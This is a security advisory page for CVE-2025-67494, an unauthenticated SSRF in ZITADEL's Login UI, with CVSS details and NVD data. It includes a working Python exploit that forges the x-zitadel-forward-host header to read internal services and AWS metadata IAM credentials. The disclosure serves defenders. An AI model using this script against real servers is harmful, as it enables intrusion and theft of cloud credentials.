Security Vulnerability Report
中文
CVE-2025-67494 CVSS 9.3 CRITICAL

CVE-2025-67494

Published: 2025-12-09 22:16:16
Last Modified: 2025-12-19 18:53:35
Source: [email protected]

Description

ZITADEL is an open-source identity infrastructure tool. Versions 4.7.0 and below are vulnerable to an unauthenticated, full-read SSRF vulnerability. The ZITADEL Login UI (V2) treats the x-zitadel-forward-host header as a trusted fallback for all deployments, including self-hosted instances. This allows an unauthenticated attacker to force the server to make HTTP requests to arbitrary domains, such as internal addresses, and read the responses, enabling data exfiltration and bypassing network-segmentation controls. This issue is fixed in version 4.7.1.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE
ZITADEL <= 4.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67494 PoC - ZITADEL Unauthenticated Full-Read SSRF # Target: ZITADEL instances <= v4.7.0 def exploit_ssrf(target_url, internal_target): """ Exploit SSRF by injecting x-zitadel-forward-host header Args: target_url: ZITADEL login page URL (e.g., https://vulnerable-zitadel.com/login) internal_target: Internal service URL to target (e.g., http://169.254.169.254/latest/meta-data/) """ headers = { 'x-zitadel-forward-host': internal_target, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } try: print(f'[*] Sending SSRF request to: {target_url}') print(f'[*] Targeting internal resource: {internal_target}') response = requests.get(target_url, headers=headers, timeout=10, verify=False) print(f'[+] Status Code: {response.status_code}') print(f'[+] Response Length: {len(response.text)} bytes') print('\n[+] Response Content:') print(response.text[:2000]) # Print first 2000 chars return response.text except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') return None def check_common_targets(target_url): """Check common SSRF targets""" targets = [ ('AWS Metadata', 'http://169.254.169.254/latest/meta-data/'), ('AWS IAM', 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'), ('Internal API', 'http://localhost:8080/admin/api'), ('Internal Health', 'http://127.0.0.1:80/health'), ('Internal Config', 'http://internal.corp.local:8080/config') ] print(f'[*] Testing common SSRF targets against {target_url}\n') for name, url in targets: print(f'\n[*] Testing {name}: {url}') exploit_ssrf(target_url, url) if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-67494.py <target_url> [internal_url]') print('Example: python cve-2025-67494.py https://zitadel.company.com/login') print('Example: python cve-2025-67494.py https://zitadel.company.com/login http://169.254.169.254/latest/meta-data/') sys.exit(1) target = sys.argv[1] if len(sys.argv) >= 3: exploit_ssrf(target, sys.argv[2]) else: check_common_targets(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67494", "sourceIdentifier": "[email protected]", "published": "2025-12-09T22:16:16.187", "lastModified": "2025-12-19T18:53:34.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZITADEL is an open-source identity infrastructure tool. Versions 4.7.0 and below are vulnerable to an unauthenticated, full-read SSRF vulnerability. The ZITADEL Login UI (V2) treats the x-zitadel-forward-host header as a trusted fallback for all deployments, including self-hosted instances. This allows an unauthenticated attacker to force the server to make HTTP requests to arbitrary domains, such as internal addresses, and read the responses, enabling data exfiltration and bypassing network-segmentation controls. This issue is fixed in version 4.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.7.1", "matchCriteriaId": "E1B051D6-969F-4B70-BF3F-AFD77FB00251"}]}]}], "references": [{"url": "https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-7wfc-4796-gmg5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.